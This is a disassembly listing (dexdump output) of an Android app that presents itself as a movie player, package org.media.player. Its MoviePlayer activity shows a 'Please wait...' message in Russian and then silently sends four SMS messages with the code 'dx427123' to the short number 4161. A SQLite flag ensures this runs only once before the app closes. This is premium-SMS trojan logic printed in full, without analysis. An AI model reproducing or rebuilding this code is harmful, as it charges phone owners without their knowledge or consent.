000ba4: 7120 0e00 1000                         |0004: invoke-static {v0, v1}, Landroid/util/Log;.w:(Ljava/lang/String;Ljava/lang/String;)I // method@000e
000baa: 1a00 0b00                              |0007: const-string v0, "DROP TABLE IF EXISTS table1" // string@000b
000bae: 6e20 0800 0300                         |0009: invoke-virtual {v3, v0}, Landroid/database/sqlite/SQLiteDatabase;.execSQL:(Ljava/lang/String;)V // method@0008
000bb4: 6e20 2500 3200                         |000c: invoke-virtual {v2, v3}, Lorg/media/player/DataHelper$OpenHelper;.onCreate:(Landroid/database/sqlite/SQLiteDatabase;)V // method@0025
000bba: 0e00                                   |000f: return-void
      catches       : (none)
      positions     : 
        0x0000 line=66
        0x0007 line=67
        0x000c line=68
        0x000f line=69
      locals        : 
        0x0000 - 0x0010 reg=2 this Lorg/media/player/DataHelper$OpenHelper; 
        0x0000 - 0x0010 reg=3 db Landroid/database/sqlite/SQLiteDatabase; 
        0x0000 - 0x0010 reg=4 oldVersion I 
        0x0000 - 0x0010 reg=5 newVersion I 

  source_file_idx   : 12 (DataHelper.java)

Class #9 header:
class_idx           : 30
access_flags        : 1 (0x0001)
superclass_idx      : 19
interfaces_off      : 0 (0x000000)
source_file_idx     : 12
annotations_off     : 3652 (0x000e44)
class_data_off      : 6494 (0x00195e)
static_fields_size  : 4
instance_fields_size: 3
direct_methods_size : 1
virtual_methods_size: 2

Class #9            -
  Class descriptor  : 'Lorg/media/player/DataHelper;'
  Access flags      : 0x0001 (PUBLIC)
  Superclass        : 'Ljava/lang/Object;'
  Interfaces        -
  Static fields     -
    #0              : (in Lorg/media/player/DataHelper;)
      name          : 'DATABASE_NAME'
      type          : 'Ljava/lang/String;'
      access        : 0x001a (PRIVATE STATIC FINAL)
    #1              : (in Lorg/media/player/DataHelper;)
      name          : 'DATABASE_VERSION'
      type          : 'I'
      access        : 0x001a (PRIVATE STATIC FINAL)
    #2              : (in Lorg/media/player/DataHelper;)
      name          : 'INSERT'
      type          : 'Ljava/lang/String;'
      access        : 0x001a (PRIVATE STATIC FINAL)
    #3              : (in Lorg/media/player/DataHelper;)
      name          : 'TABLE_NAME'
      type          : 'Ljava/lang/String;'
      access        : 0x001a (PRIVATE STATIC FINAL)
  Instance fields   -
    #0              : (in Lorg/media/player/DataHelper;)
      name          : 'context'
      type          : 'Landroid/content/Context;'
      access        : 0x0002 (PRIVATE)
    #1              : (in Lorg/media/player/DataHelper;)
      name          : 'db'
      type          : 'Landroid/database/sqlite/SQLiteDatabase;'
      access        : 0x0002 (PRIVATE)
    #2              : (in Lorg/media/player/DataHelper;)
      name          : 'insertStmt'
      type          : 'Landroid/database/sqlite/SQLiteStatement;'
      access        : 0x0002 (PRIVATE)
  Direct methods    -
    #0              : (in Lorg/media/player/DataHelper;)
      name          : '<init>'
      type          : '(Landroid/content/Context;)V'
      access        : 0x10001 (PUBLIC CONSTRUCTOR)
      code          -
      registers     : 5
      ins           : 2
      outs          : 2
      insns size    : 29 16-bit code units
000bbc:                                        |[000bbc] org.media.player.DataHelper.<init>:(Landroid/content/Context;)V
000bcc: 7010 1100 0300                         |0000: invoke-direct {v3}, Ljava/lang/Object;.<init>:()V // method@0011
000bd2: 5b34 0e00                              |0003: iput-object v4, v3, Lorg/media/player/DataHelper;.context:Landroid/content/Context; // field@000e
000bd6: 2200 1d00                              |0005: new-instance v0, Lorg/media/player/DataHelper$OpenHelper; // type@001d
000bda: 5431 0e00                              |0007: iget-object v1, v3, Lorg/media/player/DataHelper;.context:Landroid/content/Context; // field@000e
000bde: 7020 2300 1000                         |0009: invoke-direct {v0, v1}, Lorg/media/player/DataHelper$OpenHelper;.<init>:(Landroid/content/Context;)V // method@0023
000be4: 6e10 2400 0000                         |000c: invoke-virtual {v0}, Lorg/media/player/DataHelper$OpenHelper;.getWritableDatabase:()Landroid/database/sqlite/SQLiteDatabase; // method@0024
000bea: 0c01                                   |000f: move-result-object v1
000bec: 5b31 0f00                              |0010: iput-object v1, v3, Lorg/media/player/DataHelper;.db:Landroid/database/sqlite/SQLiteDatabase; // field@000f
000bf0: 5431 0f00                              |0012: iget-object v1, v3, Lorg/media/player/DataHelper;.db:Landroid/database/sqlite/SQLiteDatabase; // field@000f
000bf4: 1a02 5c00                              |0014: const-string v2, "insert into table1(was) values ('was')" // string@005c
000bf8: 6e20 0700 2100                         |0016: invoke-virtual {v1, v2}, Landroid/database/sqlite/SQLiteDatabase;.compileStatement:(Ljava/lang/String;)Landroid/database/sqlite/SQLiteStatement; // method@0007
000bfe: 0c01                                   |0019: move-result-object v1
000c00: 5b31 1000                              |001a: iput-object v1, v3, Lorg/media/player/DataHelper;.insertStmt:Landroid/database/sqlite/SQLiteStatement; // field@0010
000c04: 0e00                                   |001c: return-void
      catches       : (none)
      positions     : 
        0x0000 line=24
        0x0003 line=25
        0x0005 line=26
        0x000c line=27
        0x0012 line=28
        0x001c line=29
      locals        : 
        0x000c - 0x001d reg=0 openHelper Lorg/media/player/DataHelper$OpenHelper; 
        0x0000 - 0x001d reg=3 this Lorg/media/player/DataHelper; 
        0x0000 - 0x001d reg=4 context Landroid/content/Context; 

  Virtual methods   -
    #0              : (in Lorg/media/player/DataHelper;)
      name          : 'canwe'
      type          : '()Z'
      access        : 0x0001 (PUBLIC)
      code          -
      registers     : 14
      ins           : 1
      outs          : 8
      insns size    : 64 16-bit code units
000c08:                                        |[000c08] org.media.player.DataHelper.canwe:()Z
000c18: 121b                                   |0000: const/4 v11, #int 1 // #1
000c1a: 120a                                   |0001: const/4 v10, #int 0 // #0
000c1c: 1203                                   |0002: const/4 v3, #int 0 // #0
000c1e: 1a0c 7700                              |0003: const-string v12, "was" // string@0077
000c22: 1a09 6700                              |0005: const-string v9, "no" // string@0067
000c26: 54d0 0f00                              |0007: iget-object v0, v13, Lorg/media/player/DataHelper;.db:Landroid/database/sqlite/SQLiteDatabase; // field@000f
000c2a: 1a01 7200                              |0009: const-string v1, "table1" // string@0072
000c2e: 23b2 2700                              |000b: new-array v2, v11, [Ljava/lang/String; // type@0027
000c32: 1a04 7700                              |000d: const-string v4, "was" // string@0077
000c36: 4d0c 020a                              |000f: aput-object v12, v2, v10
000c3a: 0734                                   |0011: move-object v4, v3
000c3c: 0735                                   |0012: move-object v5, v3
000c3e: 0736                                   |0013: move-object v6, v3
000c40: 0737                                   |0014: move-object v7, v3
000c42: 7408 0900 0000                         |0015: invoke-virtual/range {v0, v1, v2, v3, v4, v5, v6, v7}, Landroid/database/sqlite/SQLiteDatabase;.query:(Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)Landroid/database/Cursor; // method@0009
000c48: 0c08                                   |0018: move-result-object v8
000c4a: 7210 0500 0800                         |0019: invoke-interface {v8}, Landroid/database/Cursor;.moveToFirst:()Z // method@0005
000c50: 0a00                                   |001c: move-result v0
000c52: 3800 0c00                              |001d: if-eqz v0, 0029 // +000c
000c56: 7220 0300 a800                         |001f: invoke-interface {v8, v10}, Landroid/database/Cursor;.getString:(I)Ljava/lang/String; // method@0003
000c5c: 0c09                                   |0022: move-result-object v9
000c5e: 7210 0600 0800                         |0023: invoke-interface {v8}, Landroid/database/Cursor;.moveToNext:()Z // method@0006
000c64: 0a00                                   |0026: move-result v0
000c66: 3900 f8ff                              |0027: if-nez v0, 001f // -0008
000c6a: 3808 0b00                              |0029: if-eqz v8, 0034 // +000b
000c6e: 7210 0400 0800                         |002b: invoke-interface {v8}, Landroid/database/Cursor;.isClosed:()Z // method@0004
000c74: 0a00                                   |002e: move-result v0
000c76: 3900 0500                              |002f: if-nez v0, 0034 // +0005
000c7a: 7210 0200 0800                         |0031: invoke-interface {v8}, Landroid/database/Cursor;.close:()V // method@0002
000c80: 1a00 7700                              |0034: const-string v0, "was" // string@0077
000c84: 6e20 1200 c900                         |0036: invoke-virtual {v9, v12}, Ljava/lang/String;.equals:(Ljava/lang/Object;)Z // method@0012
000c8a: 0a00                                   |0039: move-result v0
000c8c: 3800 0400                              |003a: if-eqz v0, 003e // +0004
000c90: 01a0                                   |003c: move v0, v10
000c92: 0f00                                   |003d: return v0
000c94: 01b0                                   |003e: move v0, v11
000c96: 28fe                                   |003f: goto 003d // -0002
      catches       : (none)
      positions     : 
        0x0005 line=36
        0x0007 line=37
        0x0019 line=39
        0x001f line=41
        0x0023 line=42
        0x0029 line=44
        0x0031 line=45
        0x0034 line=47
        0x003d line=50
      locals        : 
        0x0019 - 0x0040 reg=8 cursor Landroid/database/Cursor; 
        0x0007 - 0x0040 reg=9 result Ljava/lang/String; 
        0x0000 - 0x0040 reg=13 this Lorg/media/player/DataHelper; 

    #1              : (in Lorg/media/player/DataHelper;)
      name          : 'was'
      type          : '()V'
      access        : 0x0001 (PUBLIC)
      code          -
      registers     : 2
      ins           : 1
      outs          : 1
      insns size    : 6 16-bit code units
000c98:                                        |[000c98] org.media.player.DataHelper.was:()V
000ca8: 5410 1000                              |0000: iget-object v0, v1, Lorg/media/player/DataHelper;.insertStmt:Landroid/database/sqlite/SQLiteStatement; // field@0010
000cac: 6e10 0b00 0000                         |0002: invoke-virtual {v0}, Landroid/database/sqlite/SQLiteStatement;.executeInsert:()J // method@000b
000cb2: 0e00                                   |0005: return-void
      catches       : (none)
      positions     : 
        0x0000 line=32
        0x0005 line=33
      locals        : 
        0x0000 - 0x0006 reg=1 this Lorg/media/player/DataHelper; 

  source_file_idx   : 12 (DataHelper.java)

Class #10 header:
class_idx           : 31
access_flags        : 1 (0x0001)
superclass_idx      : 2
interfaces_off      : 0 (0x000000)
source_file_idx     : 57
annotations_off     : 0 (0x000000)
class_data_off      : 6526 (0x00197e)
static_fields_size  : 0
instance_fields_size: 1
direct_methods_size : 1
virtual_methods_size: 1

Class #10            -
  Class descriptor  : 'Lorg/media/player/MoviePlayer;'
  Access flags      : 0x0001 (PUBLIC)
  Superclass        : 'Landroid/app/Activity;'
  Interfaces        -
  Static fields     -
  Instance fields   -
    #0              : (in Lorg/media/player/MoviePlayer;)
      name          : 'ContentURI'
      type          : 'Ljava/lang/Object;'
      access        : 0x0002 (PRIVATE)
  Direct methods    -
    #0              : (in Lorg/media/player/MoviePlayer;)
      name          : '<init>'
      type          : '()V'
      access        : 0x10001 (PUBLIC CONSTRUCTOR)
      code          -
      registers     : 1
      ins           : 1
      outs          : 1
      insns size    : 4 16-bit code units
000cb4:                                        |[000cb4] org.media.player.MoviePlayer.<init>:()V
000cc4: 7010 0000 0000                         |0000: invoke-direct {v0}, Landroid/app/Activity;.<init>:()V // method@0000
000cca: 0e00                                   |0003: return-void
      catches       : (none)
      positions     : 
        0x0000 line=10
      locals        : 
        0x0000 - 0x0004 reg=0 this Lorg/media/player/MoviePlayer; 

  Virtual methods   -
    #0              : (in Lorg/media/player/MoviePlayer;)
      name          : 'onCreate'
      type          : '(Landroid/os/Bundle;)V'
      access        : 0x0001 (PUBLIC)
      code          -
      registers     : 11
      ins           : 2
      outs          : 6
      insns size    : 55 16-bit code units
000ccc:                                        |[000ccc] org.media.player.MoviePlayer.onCreate:(Landroid/os/Bundle;)V
000cdc: 1202                                   |0000: const/4 v2, #int 0 // #0
000cde: 6f20 0100 a900                         |0001: invoke-super {v9, v10}, Landroid/app/Activity;.onCreate:(Landroid/os/Bundle;)V // method@0001
000ce4: 2206 1e00                              |0004: new-instance v6, Lorg/media/player/DataHelper; // type@001e
000ce8: 7020 2700 9600                         |0006: invoke-direct {v6, v9}, Lorg/media/player/DataHelper;.<init>:(Landroid/content/Context;)V // method@0027
000cee: 6e10 2800 0600                         |0009: invoke-virtual {v6}, Lorg/media/player/DataHelper;.canwe:()Z // method@0028
000cf4: 0a01                                   |000c: move-result v1
000cf6: 3801 2600                              |000d: if-eqz v1, 0033 // +0026
000cfa: 2208 0e00                              |000f: new-instance v8, Landroid/widget/TextView; // type@000e
000cfe: 7020 0f00 9800                         |0011: invoke-direct {v8, v9}, Landroid/widget/TextView;.<init>:(Landroid/content/Context;)V // method@000f
000d04: 1a01 7800                              |0014: const-string v1, "Подождите..." // string@0078
000d08: 6e20 1000 1800                         |0016: invoke-virtual {v8, v1}, Landroid/widget/TextView;.setText:(Ljava/lang/CharSequence;)V // method@0010
000d0e: 6e20 2d00 8900                         |0019: invoke-virtual {v9, v8}, Lorg/media/player/MoviePlayer;.setContentView:(Landroid/view/View;)V // method@002d
000d14: 7100 0c00 0000                         |001c: invoke-static {}, Landroid/telephony/SmsManager;.getDefault:()Landroid/telephony/SmsManager; // method@000c
000d1a: 0c00                                   |001f: move-result-object v0
000d1c: 1207                                   |0020: const/4 v7, #int 0 // #0
000d1e: 1241                                   |0021: const/4 v1, #int 4 // #4
000d20: 3517 0e00                              |0022: if-ge v7, v1, 0030 // +000e
000d24: 1a01 0000                              |0024: const-string v1, "4161" // string@0000
000d28: 1a03 5100                              |0026: const-string v3, "dx427123" // string@0051
000d2c: 0724                                   |0028: move-object v4, v2
000d2e: 0725                                   |0029: move-object v5, v2
000d30: 7406 0d00 0000                         |002a: invoke-virtual/range {v0, v1, v2, v3, v4, v5}, Landroid/telephony/SmsManager;.sendTextMessage:(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V // method@000d
000d36: d807 0701                              |002d: add-int/lit8 v7, v7, #int 1 // #01
000d3a: 28f2                                   |002f: goto 0021 // -000e
000d3c: 6e10 2900 0600                         |0030: invoke-virtual {v6}, Lorg/media/player/DataHelper;.was:()V // method@0029
000d42: 6e10 2b00 0900                         |0033: invoke-virtual {v9}, Lorg/media/player/MoviePlayer;.finish:()V // method@002b
000d48: 0e00                                   |0036: return-void
      catches       : (none)
      positions     : 
        0x0001 line=15
        0x0004 line=16
        0x0009 line=17
        0x000f line=19
        0x0014 line=20
        0x0019 line=21
        0x001c line=22
        0x0020 line=35
        0x0024 line=37
        0x002d line=35
        0x0030 line=42
        0x0033 line=45
        0x0036 line=48
      locals        : 
        0x0020 - 0x0033 reg=0 m Landroid/telephony/SmsManager; 
        0x0021 - 0x0033 reg=7 i I 
        0x0014 - 0x0033 reg=8 tv Landroid/widget/TextView; 
        0x0009 - 0x0037 reg=6 dh Lorg/media/player/DataHelper; 
        0x0000 - 0x0037 reg=9 this Lorg/media/player/MoviePlayer; 
        0x0000 - 0x0037 reg=10 icicle Landroid/os/Bundle; 

  source_file_idx   : 57 (MoviePlayer.java)

Class #11 header:
class_idx           : 32
access_flags        : 17 (0x0011)
superclass_idx      : 19
interfaces_off      : 0 (0x000000)
source_file_idx     : 59
annotations_off     : 3668 (0x000e54)
class_data_off      : 6542 (0x00198e)
static_fields_size  : 0
instance_fields_size: 0
direct_methods_size : 1
virtual_methods_size: 0

Class #11            -
  Class descriptor  : 'Lorg/media/player/R$attr;'
  Access flags      : 0x0011 (PUBLIC FINAL)
  Superclass        : 'Ljava/lang/Object;'
  Interfaces        -
  Static fields     -
  Instance fields   -
  Direct methods    -
    #0              : (in Lorg/media/player/R$attr;)
      name          : '<init>'
      type          : '()V'
      access        : 0x10001 (PUBLIC CONSTRUCTOR)
      code          -
      registers     : 1
      ins           : 1
      outs          : 1
      insns size    : 4 16-bit code units
000d4c:                                        |[000d4c] org.media.player.R.attr.<init>:()V
000d5c: 7010 1100 0000                         |0000: invoke-direct {v0}, Ljava/lang/Object;.<init>:()V // method@0011
000d62: 0e00                                   |0003: return-void
      catches       : (none)
      positions     : 
        0x0000 line=11
      locals        : 
        0x0000 - 0x0004 reg=0 this Lorg/media/player/R$attr; 

  Virtual methods   -
  source_file_idx   : 59 (R.java)

Class #12 header:
class_idx           : 33
access_flags        : 17 (0x0011)
superclass_idx      : 19
interfaces_off      : 0 (0x000000)
source_file_idx     : 59
annotations_off     : 3684 (0x000e64)
class_data_off      : 6552 (0x001998)
static_fields_size  : 1
instance_fields_size: 0
direct_methods_size : 1
virtual_methods_size: 0

Class #12            -
  Class descriptor  : 'Lorg/media/player/R$drawable;'
  Access flags      : 0x0011 (PUBLIC FINAL)
  Superclass        : 'Ljava/lang/Object;'
  Interfaces        -
  Static fields     -
    #0              : (in Lorg/media/player/R$drawable;)
      name          : 'icon'
      type          : 'I'
      access        : 0x0019 (PUBLIC STATIC FINAL)
  Instance fields   -
  Direct methods    -
    #0              : (in Lorg/media/player/R$drawable;)
      name          : '<init>'
      type          : '()V'
      access        : 0x10001 (PUBLIC CONSTRUCTOR)
      code          -
      registers     : 1
      ins           : 1
      outs          : 1
      insns size    : 4 16-bit code units
000d64:                                        |[000d64] org.media.player.R.drawable.<init>:()V
000d74: 7010 1100 0000                         |0000: invoke-direct {v0}, Ljava/lang/Object;.<init>:()V // method@0011
000d7a: 0e00                                   |0003: return-void
      catches       : (none)
      positions     : 
        0x0000 line=13
      locals        : 
        0x0000 - 0x0004 reg=0 this Lorg/media/player/R$drawable; 

  Virtual methods   -
  source_file_idx   : 59 (R.java)

Class #13 header:
class_idx           : 34
access_flags        : 17 (0x0011)
superclass_idx      : 19
interfaces_off      : 0 (0x000000)
source_file_idx     : 59
annotations_off     : 3700 (0x000e74)
class_data_off      : 6564 (0x0019a4)
static_fields_size  : 1
instance_fields_size: 0
direct_methods_size : 1
virtual_methods_size: 0

Class #13            -
  Class descriptor  : 'Lorg/media/player/R$layout;'
  Access flags      : 0x0011 (PUBLIC FINAL)
  Superclass        : 'Ljava/lang/Object;'
  Interfaces        -
  Static fields     -
    #0              : (in Lorg/media/player/R$layout;)
      name          : 'main'
      type          : 'I'
      access        : 0x0019 (PUBLIC STATIC FINAL)
  Instance fields   -
  Direct methods    -
    #0              : (in Lorg/media/player/R$layout;)
      name          : '<init>'
      type          : '()V'
      access        : 0x10001 (PUBLIC CONSTRUCTOR)
      code          -
      registers     : 1
      ins           : 1
      outs          : 1
      insns size    : 4 16-bit code units
000d7c:                                        |[000d7c] org.media.player.R.layout.<init>:()V
000d8c: 7010 1100 0000                         |0000: invoke-direct {v0}, Ljava/lang/Object;.<init>:()V // method@0011
000d92: 0e00                                   |0003: return-void
      catches       : (none)
      positions     : 
        0x0000 line=16
      locals        : 
        0x0000 - 0x0004 reg=0 this Lorg/media/player/R$layout; 

  Virtual methods   -
  source_file_idx   : 59 (R.java)

Class #14 header:
class_idx           : 35
access_flags        : 17 (0x0011)
superclass_idx      : 19
interfaces_off      : 0 (0x000000)
source_file_idx     : 59
annotations_off     : 3716 (0x000e84)
class_data_off      : 6576 (0x0019b0)
static_fields_size  : 1
instance_fields_size: 0
direct_methods_size : 1
virtual_methods_size: 0

Class #14            -
  Class descriptor  : 'Lorg/media/player/R$string;'
  Access flags      : 0x0011 (PUBLIC FINAL)
  Superclass        : 'Ljava/lang/Object;'
  Interfaces        -
  Static fields     -
    #0              : (in Lorg/media/player/R$string;)
      name          : 'app_name'
      type          : 'I'
      access        : 0x0019 (PUBLIC STATIC FINAL)
  Instance fields   -
  Direct methods    -
    #0              : (in Lorg/media/player/R$string;)
      name          : '<init>'
      type          : '()V'
      access        : 0x10001 (PUBLIC CONSTRUCTOR)
      code          -
      registers     : 1
      ins           : 1
      outs          : 1
      insns size    : 4 16-bit code units
000d94:                                        |[000d94] org.media.player.R.string.<init>:()V
000da4: 7010 1100 0000                         |0000: invoke-direct {v0}, Ljava/lang/Object;.<init>:()V // method@0011
000daa: 0e00                                   |0003: return-void
      catches       : (none)
      positions     : 
        0x0000 line=19
      locals        : 
        0x0000 - 0x0004 reg=0 this Lorg/media/player/R$string; 

  Virtual methods   -
  source_file_idx   : 59 (R.java)

Class #15 header:
class_idx           : 36
access_flags        : 17 (0x0011)
superclass_idx      : 19
interfaces_off      : 0 (0x000000)
source_file_idx     : 59
annotations_off     : 3732 (0x000e94)
class_data_off      : 6588 (0x0019bc)
static_fields_size  : 0
instance_fields_size: 0
direct_methods_size : 1
virtual_methods_size: 0

Class #15            -
  Class descriptor  : 'Lorg/media/player/R;'
  Access flags      : 0x0011 (PUBLIC FINAL)
  Superclass        : 'Ljava/lang/Object;'
  Interfaces        -
  Static fields     -
  Instance fields   -
  Direct methods    -
    #0              : (in Lorg/media/player/R;)
      name          : '<init>'
      type          : '()V'
      access        : 0x10001 (PUBLIC CONSTRUCTOR)
      code          -
      registers     : 1
      ins           : 1
      outs          : 1
      insns size    : 4 16-bit code units
000dac:                                        |[000dac] org.media.player.R.<init>:()V
000dbc: 7010 1100 0000                         |0000: invoke-direct {v0}, Ljava/lang/Object;.<init>:()V // method@0011
000dc2: 0e00                                   |0003: return-void
      catches       : (none)
      positions     : 
        0x0000 line=10
        0x0003 line=19
      locals        : 
        0x0000 - 0x0004 reg=0 this Lorg/media/player/R; 

  Virtual methods   -
  source_file_idx   : 59 (R.java)

